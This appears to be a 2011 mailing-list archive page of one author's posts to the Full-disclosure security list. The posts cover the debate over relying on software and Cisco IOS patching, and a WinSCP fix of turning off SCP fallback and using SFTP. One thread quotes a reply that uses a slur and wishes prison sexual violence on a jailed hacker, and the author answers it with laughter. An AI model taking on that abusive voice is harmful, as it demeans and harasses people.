> > certification is the CISSP and it seems like a very long journey to it since
> > I have no experience in it at all but need to get my foot in.
> >
> > Could anyone please advise me on the best path to being a security
> > professional? ie from beginner to pro?
> >
> > All advice will be well appreciated.
> >
> > Thanks
> >
> >
> >
>

Re: [Full-disclosure] Getting Off the Patch

2011-01-19 Thread Cal Leeming [Simplicity Media Ltd]
failovers*

On Thu, Jan 20, 2011 at 2:16 AM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> If the IOS has a remote exp vuln, then hell yes. That is, until the client
> tells us to go f*ck ourselves as the downtime would affect their SLAs and
> they don't have fall overs in place. lol.
>
> On Thu, Jan 20, 2011 at 2:06 AM, Pete Smith wrote:
>
>> All,
>>
>> I agree with most of the stuff that Thor has been saying and from what I
>> have read this has mostly been centred around patching software on servers.
>> However most large companies take the don't patch or patch infrequently
>> stance when it comes to network infrastructure, Cisco, Juniper, 3COM, HP and
>> other large network infrastructure companies by no means have a clean record
>> when it comes to vulnerabilities in their software but yet businesses will
>> often not patch even in environments that are highly redundant and can be
>> rebooted with no or little impact.
>>
>> Can anyone seriously say that they patch every time Cisco releases a new
>> version of IOS?
>>
>> ...
>>

Re: [Full-disclosure] Getting Off the Patch

2011-01-19 Thread Cal Leeming [Simplicity Media Ltd]
If the IOS has a remote exp vuln, then hell yes. That is, until the client
tells us to go f*ck ourselves as the downtime would affect their SLAs and
they don't have fall overs in place. lol.

On Thu, Jan 20, 2011 at 2:06 AM, Pete Smith  wrote:

> All,
>
> I agree with most of the stuff that Thor has been saying and from what I
> have read this has mostly been centred around patching software on servers.
> However most large companies take the don't patch or patch infrequently
> stance when it comes to network infrastructure, Cisco, Juniper, 3COM, HP and
> other large network infrastructure companies by no means have a clean record
> when it comes to vulnerabilities in their software but yet businesses will
> often not patch even in environments that are highly redundant and can be
> rebooted with no or little impact.
>
> Can anyone seriously say that they patch every time Cisco releases a new
> version of IOS?
>
> ...
>

[Full-disclosure] (off topic) windows + debian + WinSCP + chroot'd shell + timestamp + SCP + SFTP + keep remote directory up to date

2011-01-19 Thread Cal Leeming [Simplicity Media Ltd]
*Before I start, this is totally NOT the right list for this discussion, but
I needed somewhere popular that would be indexed by Google, so anyone else
with the same problem won't go through the same two hours of bullshit I just
did. Anyone who bitches at me about this shall be declared king of the rank
"asshattery".*

--

WinSCP comes with this neat little feature called "Keep remote directory up
to date", and it worked for every server I used apart from one. It was
uploading all the files over and over again, even if only one of them had
changed.  At first I thought, maybe it was because of timestamp
configurations and version changes (I tried mixing dst / local conventions
preserve / non preserve etc), all with no success.

Then I realised, that the connection was falling back onto SCP silently,
rather than using SFTP. This was causing the feature to break.

If anyone else experiences this same issue, make sure to untick "Allow SCP
fallback", select SFTP as the file protocol, and if it throws an error, then
make sure SFTP is installed / configured correctly on the server.

Much love x x

Cal

Re: [Full-disclosure] Career Criminal Andrew Auernheimer / Weev Is In Jail Right Now

2011-01-19 Thread Cal Leeming [Simplicity Media Ltd]
LMFAO.

On Wed, Jan 19, 2011 at 11:51 AM, huj huj huj  wrote:

> lets hope that cockgobbling retard gets a one way ticket to being tyrones
> cumdumpster
>
> 2011/1/18 coderman 
>
> sir,
>>
>> "quiet" is the absence of sound, akin to the absence of thought in your
>> reply.
>>
>>
>> On Tue, Jan 18, 2011 at 9:59 AM, Eyeballing Weev
>>  wrote:
>> > I guess you didn't get the memo about weev being in jail. ...
>> ...
>> > On 01/18/2011 12:48 PM, coderman wrote:
>> >> ... at least it will be a little more quiet without
>>  >> Augmammer spamming for a while ...
>>

Re: [Full-disclosure] Getting Off the Patch

2011-01-19 Thread Cal Leeming [Simplicity Media Ltd]
In that case, my two cents on the matter would be that the thought process
behind this "no patch method" has come from someone with very little
development and/or security background.

On Wed, Jan 19, 2011 at 9:16 AM, Christian Sciberras wrote:

> Ah, but that is YOUR argument. They don't seem to agree with it.
>
> Heck if they did, every single word so far would have been completely
> unnecessary, since layering security is what we've done ever since the first
> knife was invented!
>
>
>
>
>
>
>
>
> On Wed, Jan 19, 2011 at 10:13 AM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Christian,
>>
>> There is no 'direct alternative' as we have already established that there
>> is no "be all and end all" for security, it's when you layer these factors
>> on top of each other that it becomes more effective.
>>
>> On Tue, Jan 18, 2011 at 11:45 PM, Christian Sciberras 
>> wrote:
>>
>>> I'm getting a bit annoyed reading over and over arguments which I've
>>> highlighted some time ago anyway (
>>> http://www.mail-archive.com/full-disclosure@lists.grok.org.uk/msg44454.html
>>> ).
>>>
>>> The real question, what is the *direct* alternative to patching?
>>>
>>> Don't say "sandboxing" because it doesn't always work.
>>> And don't tell me about only installing the system critical issues only -
>>> that's called "update by priority".
>>> Also, please remember that we are talking against patching, not
>>> discussing where patching works(/ is better) or not so I would expect any
>>> serious arguments to completely exclude patching.
>>>
>>> Regards,
>>> Chris.
>>>
>>>
>>>
>>>
>>>
>>>
>>> On Tue, Jan 18, 2011 at 9:05 PM, coderman  wrote:
>>>
>>>> On Tue, Jan 18, 2011 at 11:43 AM, phocean <0...@phocean.net> wrote:
>>>> > ... how is this new ? It has been the best
>>>> > practice of good system/security administrators for years.
>>>> >
>>>> > And it doesn't look like a "no patching" policy yet...
>>>>
>>>>
>>>> sure, .. though you've made me sad considering how few organizations
>>>> do "best practice, good system/security administration".
>>>>
>>>> not new, still difficult?   (~_~;)
>>>>
>>>>
>>>>  that leaves consensus:
>>>>"no patching" elusive, yet to be observed in real-world. (e.g.
>>>> yeti or bigfeets)
>>>>

Re: [Full-disclosure] Getting Off the Patch

2011-01-19 Thread Cal Leeming [Simplicity Media Ltd]
Christian,

There is no 'direct alternative' as we have already established that there
is no "be all and end all" for security, it's when you layer these factors
on top of each other that it becomes more effective.

On Tue, Jan 18, 2011 at 11:45 PM, Christian Sciberras wrote:

> I'm getting a bit annoyed reading over and over arguments which I've
> highlighted some time ago anyway (
> http://www.mail-archive.com/full-disclosure@lists.grok.org.uk/msg44454.html
> ).
>
> The real question, what is the *direct* alternative to patching?
>
> Don't say "sandboxing" because it doesn't always work.
> And don't tell me about only installing the system critical issues only -
> that's called "update by priority".
> Also, please remember that we are talking against patching, not discussing
> where patching works(/ is better) or not so I would expect any serious
> arguments to completely exclude patching.
>
> Regards,
> Chris.
>
>
>
>
>
>
> On Tue, Jan 18, 2011 at 9:05 PM, coderman  wrote:
>
>> On Tue, Jan 18, 2011 at 11:43 AM, phocean <0...@phocean.net> wrote:
>> > ... how is this new ? It has been the best
>> > practice of good system/security administrators for years.
>> >
>> > And it doesn't look like a "no patching" policy yet...
>>
>>
>> sure, .. though you've made me sad considering how few organizations
>> do "best practice, good system/security administration".
>>
>> not new, still difficult?   (~_~;)
>>
>>
>>  that leaves consensus:
>>"no patching" elusive, yet to be observed in real-world. (e.g.
>> yeti or bigfeets)
>>

Re: [Full-disclosure] Getting Off the Patch

2011-01-18 Thread Cal Leeming [Simplicity Media Ltd]
Allow me to clarify.

"Most seasoned/established IT professionals" wouldn't rely solely on patch
day.

"Most unskilled people"  shouldn't rely solely on patch day.

On Tue, Jan 18, 2011 at 5:04 PM,  wrote:

> On Mon, 17 Jan 2011 22:29:13 GMT, "Cal Leeming [Simplicity Media Ltd]"
> said:
>
> > Most people wouldn't rely solely on patch day to protect their
> > systems/network
>
> You're in for a surprise.
>
